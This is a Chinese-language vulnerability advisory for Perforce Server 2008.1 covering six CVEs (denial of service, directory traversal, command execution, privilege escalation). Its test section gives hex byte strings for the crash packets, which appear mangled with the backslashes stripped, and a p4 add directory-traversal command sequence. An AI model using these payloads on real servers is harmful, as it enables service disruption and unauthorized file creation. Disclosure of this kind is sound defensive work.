更新日期:2010-03-10
受影响系统:
Perforce Software Perforce Server 2008.1/160022描述:
BUGTRAQ ID: 36261
CVE ID: CVE-2010-0929,CVE-2010-0930,CVE-2010-0931,CVE-2010-0932,CVE-2010-0933,CVE-2010-0934
Perforce软件配置管理系统是客户端/服务器架构的SCM工具,用户可通过Perforce客户端软件访问其服务端。
Perforce Server中的多个安全漏洞可能允许远程用户导致拒绝服务或绕过某些安全限制执行非授权操作。
1) 远程用户可以通过向监听在1666/TCP端口上的p4s.exe服务发送以0x4c、0xb3、0xff、0xff和0xff字节序列开始的特制报文导致拒绝服务。
2) 远程用户可以通过向监听在1666/TCP端口上的p4s.exe服务发送客户端版本号之前包含有0xdc、0xff、0xff和0xff字节序列的特制报文导致拒绝服务。
3) 远程用户可通过向Perforce Server中的FTP服务器组件提交特制MKD命令触发空指针引用,导致拒绝服务。
4) 通过认证的用户可通过提交包含有目录遍历序列的p4 add命令执行目录遍历攻击,在服务器上创建任意文件。
5) trigger功能允许拥有超级用户权限的已认证远程用户结合trigger脚本使用p4 client命令执行任意操作系统命令。
6) 当保护表为空时,Perforce Server允许通过认证的远程用户通过p4 protect命令获得超级用户权限。
<*来源:Intevydis
链接:http://secunia.com/advisories/38816/
http://lists.immunitysec.com/pipermail/dailydave/2010-March/006063.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
s+="x00x00x63x6cx69x65x6ex74x00x02x00x00x00x36x33x00"
s="x1bx1bx00x00x00x63x6dx70x66x69x6cx65x00x00x00x00"
s+="x00x00x63x6cx69x65x6ex74x00xdcxffxffxffx36x33x00"
s="x4cx4cx00x00x00x63x6dx70x66x69x6cx65x00x00x00x00"
s+="x00x00x63x6cx69x65x6ex74x00x02x00x00x00x36x33x00"
s+="x61x70x69x00x0cxffxffxffx39x39x39x39x39x00x73x6e"
s+="x64x62x75x66x00x05x00x00x00x36x35x35x33x36x00x66"
s+="x75x6ex63x00x08x00x00x00x70x72x6fx74x6fx63x6fx6c"
s+="x00"
$ echo TESTTEST > "..............test.txt"
$ p4 add "..............test.txt"
//depot/..............test.txt#1 - opened for add
$ p4 submit
建议:
厂商补丁:
Perforce Software
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.perforce.com/
